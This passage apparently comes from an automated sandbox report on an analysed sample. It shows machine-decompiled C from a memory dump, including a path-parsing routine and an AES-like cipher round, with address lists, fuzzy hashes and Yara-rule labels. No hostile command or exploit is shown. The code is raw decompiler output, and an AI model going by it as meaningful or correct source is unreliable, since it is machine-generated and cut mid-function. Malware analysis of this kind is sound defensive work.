					_t384 = _t384 + _t258 * 0xfffffff8;
					do {
						_t365 = (((((( *(_t367 + 1) & 0x000000ff) * 0x25 + ( *(_t367 + 2) & 0x000000ff)) * 0x25 + ( *(_t367 + 3) & 0x000000ff)) * 0x25 + ( *(_t367 + 4) & 0x000000ff)) * 0x25 + ( *(_t367 + 5) & 0x000000ff)) * 0x25 + ( *(_t367 + 6) & 0x000000ff)) * 0x25 + ( *_t367 & 0x000000ff) * 0x1a617d0d;
						_t406 =  *(_t367 + 7) & 0x000000ff;
						_t367 = _t367 + 8;
						_t393 = _t406 + _t365 - _t393 * 0x2fe8ed1f;
						_t293 = _t293 - 1;
					} while (_t293 != 0);
					_t269 = _v44;
					goto L7;
				}
			}

0x030edfce
0x030edfdd
0x030edfe1
0x030edfe3
0x030edfea
0x030ee49c
0x030ee49c
0x030ee49e
0x030ee4b0
0x030ee4b0
0x030edff0
0x030edff5
0x00000000
0x030ee003
0x030ee003
0x030ee006
0x030ee00b
0x030ee00e
0x030ee014
0x030ee07d
0x030ee07d
0x030ee080
0x030ee0d6
0x030ee0dc
0x030ee0de
0x030ee0de
0x030ee0e2
0x030ee0e5
0x030ee0ea
0x030ee0ea
0x030ee0ed
0x030ee0ef
0x030ee0f2
0x030ee0f4
0x030ee0f4
0x030ee0f4
0x030ee0f4
0x030ee0f9
0x030ee100
0x030ee105
0x030ee108
0x030ee10b
0x030ee10f
0x030ee112
0x030ee116
0x030ee119
0x030ee11d
0x030ee122
0x00000000
0x00000000
0x030ee124
0x030ee127
0x030ee12c
0x030ee197
0x030ee199
0x030ee19b
0x030ee1b8
0x030ee1b8
0x030ee1bc
0x030ee1c4
0x030ee1c8
0x030ee1cd
0x030ee1d2
0x030ee1dc
0x030ee1e1
0x030ee1e3
0x030ee1e3
0x030ee1e6
0x030ee1ea
0x030ee1f2
0x030ee1f8
0x030ee1fa
0x030ee1fd
0x030ee201
0x030ee204
0x030ee208
0x030ee20b
0x030ee20f
0x030ee214
0x030ee258
0x030ee258
0x030ee258
0x030ee25d
0x00000000
0x00000000
0x030ee267
0x030ee26d
0x030ee26f
0x030ee2a3
0x030ee2a3
0x030ee2a6
0x030ee2ac
0x030ee2b5
0x030ee2ba
0x030ee2bd
0x030ee2c5
0x030ee418
0x030ee418
0x030ee451
0x030ee45e
0x030ee460
0x030ee463
0x030ee469
0x030ee46b
0x030ee46e
0x030ee470
0x00000000
0x030ee470
0x030ee2cd
0x030ee2dc
0x00000000
0x00000000
0x030ee2e2
0x030ee2e8
0x030ee2ec
0x030ee2ec
0x030ee2fb
0x030ee303
0x030ee305
0x030ee30a
0x030ee47d
0x030ee483
0x00000000
0x00000000
0x030ee485
0x030ee485
0x030ee487
0x030ee48a
0x030ee48f
0x030ee495
0x00000000
0x030ee310
0x030ee310
0x030ee310
0x030ee315
0x030ee328
0x030ee32f
0x030ee331
0x030ee331
0x030ee336
0x030ee340
0x030ee34b
0x030ee34f
0x030ee351
0x030ee35f
0x030ee35f
0x030ee374
0x030ee377
0x030ee3e6
0x030ee3e9
0x030ee3f5
0x030ee3f7
0x030ee3fa
0x030ee3ff
0x030ee40a
0x030ee410
0x030ee415
0x030ee415
0x00000000
0x00000000
0x00000000
0x00000000
0x030ee379
0x030ee379
0x030ee379
0x030ee37c
0x030ee37f
0x030ee37f
0x030ee382
0x030ee388
0x00000000
0x00000000
0x030ee38c
0x030ee3b6
0x030ee3c1
0x030ee3c6
0x030ee3c8
0x030ee3ce
0x030ee3d0
0x030ee3d3
0x030ee3d3
0x030ee3d8
0x030ee3d8
0x030ee3db
0x030ee3e2
0x00000000
0x030ee353
0x030ee353
0x030ee355
0x030ee355
0x030ee356
0x030ee358
0x030ee35b
0x00000000
0x030ee355
0x030ee351
0x030ee317
0x030ee31c
0x030ee323
0x030ee326
0x00000000
0x00000000
0x00000000
0x00000000
0x030ee31e
0x030ee31e
0x030ee31e
0x030ee31f
0x030ee31f
0x00000000
0x030ee31e
0x030ee30a
0x00000000
0x030ee26f
0x030ee269
0x030ee26b
0x00000000
0x030ee26b
0x030ee216
0x030ee219
0x030ee21e
0x030ee29f
0x030ee286
0x030ee288
0x00000000
0x00000000
0x030ee28a
0x030ee294
0x00000000
0x00000000
0x00000000
0x030ee29a
0x030ee252
0x030ee255
0x00000000
0x030ee271
0x030ee27b
0x030ee283
0x00000000
0x030ee283
0x030ee1d4
0x030ee1d4
0x00000000
0x030ee1d4
0x030ee19d
0x030ee19d
0x030ee1a7
0x030ee1a9
0x030ee1a9
0x030ee1ae
0x00000000
0x030ee1ae
0x030ee15d
0x030ee160
0x030ee163
0x030ee166
0x030ee166
0x030ee169
0x030ee169
0x030ee16e
0x00000000
0x00000000
0x030ee177
0x030ee17d
0x030ee17f
0x00000000
0x00000000
0x030ee18d
0x00000000
0x00000000
0x030ee18f
0x00000000
0x030ee18f
0x030ee179
0x030ee17b
0x00000000
0x030ee17b
0x030ee0f4
0x030ee082
0x030ee085
0x030ee0cd
0x030ee0d3
0x030ee0d5
0x00000000
0x030ee0d5
0x030ee087
0x030ee08a
0x030ee0c4
0x030ee0ca
0x030ee0cc
0x00000000
0x030ee0cc
0x030ee08c
0x030ee08f
0x030ee0bb
0x030ee0c1
0x030ee0c3
0x00000000
0x030ee0c3
0x030ee091
0x030ee094
0x030ee0b2
0x030ee0b8
0x030ee0ba
0x00000000
0x030ee0ba
0x030ee096
0x030ee099
0x030ee0a9
0x030ee0af
0x030ee0b1
0x00000000
0x030ee0b1
0x030ee09e
0x00000000
0x00000000
0x030ee0a6
0x030ee0a8
0x00000000
0x030ee0a8
0x030ee018
0x030ee01b
0x030ee01e
0x030ee023
0x030ee025
0x030ee062
0x030ee06a
0x030ee06e
0x030ee073
0x030ee075
0x030ee075
0x030ee07a
0x00000000
0x030ee07a

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afbbaa605c207eadfac34151be5b83cc388e2e77a2a53a1e20b97ca752a6a6f0
Instruction ID: a671a7ae144d15510877fdf278b9bd02ff9d384ff488ea2ded3aeaceaf1092b5
Opcode Fuzzy Hash: afbbaa605c207eadfac34151be5b83cc388e2e77a2a53a1e20b97ca752a6a6f0
Instruction Fuzzy Hash: DCF1A572F0121A9FCB18CEA9C9D15BDFBF5AF89200B198269D856EF391D734D940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03034120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E03034120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x310d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0304F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E03036E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L03034620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E03036E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M030345F8))) {
												case 0:
													_v568 = 0x2ff1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x2ff11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L03034620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0305F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0305F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E030152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0302EB70(1, 0x31079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0302AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E030595D0();
																			L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0305B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E03053D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0305B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x03034128
0x03034135
0x0303413c
0x03034141
0x03034145
0x03034147
0x0303414e
0x03034151
0x03034159
0x0303415c
0x03034160
0x03034164
0x03034168
0x0303416c
0x0303417f
0x03034181
0x0303446a
0x0303446a
0x0303418c
0x03034195
0x03034199
0x03034432
0x03034439
0x0303443d
0x03034442
0x03034447
0x00000000
0x0303419f
0x030341a3
0x030341b1
0x030341b9
0x030341bd
0x030345db
0x030345db
0x00000000
0x030341c3
0x030341c3
0x030341ce
0x030341d4
0x0307e138
0x0307e13e
0x0307e169
0x0307e16d
0x0307e19e
0x0307e16f
0x0307e16f
0x0307e175
0x0307e179
0x0307e18f
0x0307e193
0x00000000
0x0307e199
0x00000000
0x0307e199
0x0307e193
0x00000000
0x00000000
0x00000000
0x030341da
0x030341da
0x030341df
0x030341e4
0x030341ec
0x03034203
0x03034207
0x0307e1fd
0x03034222
0x03034226
0x0307e1f3
0x0307e1f3
0x0303422c
0x0303422c
0x03034233
0x0307e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03034239
0x03034239
0x03034239
0x03034239
0x03034233
0x03034226
0x030341ee
0x030341ee
0x030341f4
0x03034575
0x0307e1b1
0x0307e1b1
0x00000000
0x0303457b
0x0303457b
0x03034582
0x0307e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x03034588
0x03034588
0x0303458c
0x0307e1c4
0x0307e1c4
0x00000000
0x03034592
0x03034592
0x03034599
0x0307e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0303459f
0x0303459f
0x030345a3
0x0307e1d7
0x0307e1e4
0x00000000
0x030345a9
0x030345a9
0x030345b0
0x0307e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x030345b6
0x030345b6
0x030345b6
0x00000000
0x030345b6
0x030345b0
0x030345a3
0x03034599
0x0303458c
0x03034582
0x00000000
0x00000000
0x00000000
0x00000000
0x030341f4
0x0303423e
0x03034241
0x030345c0
0x030345c4
0x00000000
0x030345ca
0x030345ca
0x00000000
0x0307e207
0x0307e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x030345d1
0x00000000
0x00000000
0x030345ca
0x00000000
0x03034247
0x03034247
0x03034247
0x03034249
0x03034249
0x03034249
0x03034251
0x03034251
0x03034257
0x0303425f
0x0303426e
0x03034270
0x0303427a
0x0307e219
0x0307e219
0x03034280
0x03034282
0x03034456
0x030345ea
0x00000000
0x030345f0
0x0307e223
0x00000000
0x0307e223
0x0303445c
0x0303445c
0x00000000
0x0303445c
0x00000000
0x03034288
0x0303428c
0x0307e298
0x03034292
0x03034292
0x0303429e
0x030342a3
0x030342a7
0x030342ac
0x0307e22d
0x030342b2
0x030342b2
0x030342b9
0x030342bc
0x030342c2
0x030342ca
0x030342cd
0x030342cd
0x030342d4
0x0303433f
0x0303433f
0x030342d6
0x030342d6
0x030342d9
0x030342dd
0x030342eb
0x0307e23a
0x030342f1
0x03034305
0x0303430d
0x03034315
0x03034318
0x0303431f
0x03034322
0x0303432e
0x0303433b
0x0303433b
0x00000000
0x0303432e
0x030342eb
0x0303434c
0x0303434e
0x03034352
0x03034359
0x0303435e
0x03034361
0x0303436e
0x0303438a
0x0303438e
0x03034396
0x0303439e
0x030343a1
0x030343ad
0x030343bb
0x030343bb
0x030343ad
0x0303436e
0x030343bf
0x030343c5
0x03034463
0x03034463
0x030343ce
0x030343d5
0x030343d9
0x030343df
0x03034475
0x03034479
0x03034491
0x03034491
0x03034479
0x030343e5
0x030343eb
0x030343f4
0x030343f6
0x030343f9
0x030343fc
0x030343ff
0x030344e8
0x030344ed
0x030344f3
0x0307e247
0x00000000
0x030344f9
0x03034504
0x03034508
0x0303450f
0x0307e269
0x00000000
0x03034515
0x03034519
0x03034531
0x03034534
0x03034537
0x0303453e
0x03034541
0x0303454a
0x0307e255
0x0307e255
0x0307e25b
0x0307e25e
0x0307e261
0x0307e261
0x03034555
0x03034559
0x0303455d
0x0307e26d
0x0307e270
0x0307e274
0x0307e27a
0x0307e27d
0x0307e28e
0x0307e28e
0x03034563
0x03034563
0x03034569
0x03034569
0x00000000
0x0303455d
0x0303450f
0x00000000
0x030344f3
0x030343ff
0x03034405
0x03034405
0x03034405
0x030342ac
0x0303428c
0x03034282
0x03034407
0x0303440d
0x0307e2af
0x0307e2af
0x03034413
0x03034413
0x00000000
0x030341d4
0x00000000
0x030341c3
0x030341bd
0x03034415
0x03034415
0x03034416
0x03034417
0x03034429
0x0303416e
0x0303416e
0x03034175
0x03034498
0x0303449f
0x0307e12d
0x00000000
0x0307e133
0x00000000
0x0307e133
0x030344a5
0x030344a5
0x030344aa
0x00000000
0x030344bb
0x030344ca
0x030344d6
0x030344d7
0x030344d8
0x030344e3
0x030344e3
0x030344aa
0x0303417b
0x0303417b
0x0303417b
0x00000000
0x0303417b
0x03034175
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d381149af9c3716bdd2ebbd669092804f531cb7f3026348aeeb0bfcefd979ae4
Instruction ID: 83020946efd6280c74db5d868d2d22b166f6301a8c4a3d2f9bc3c7dd9a0930ca
Opcode Fuzzy Hash: d381149af9c3716bdd2ebbd669092804f531cb7f3026348aeeb0bfcefd979ae4
Instruction Fuzzy Hash: 54F19F74A0A3118BC754CF1AC480A7AF7E9FF8A704F59496EF886CB250E734D881CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
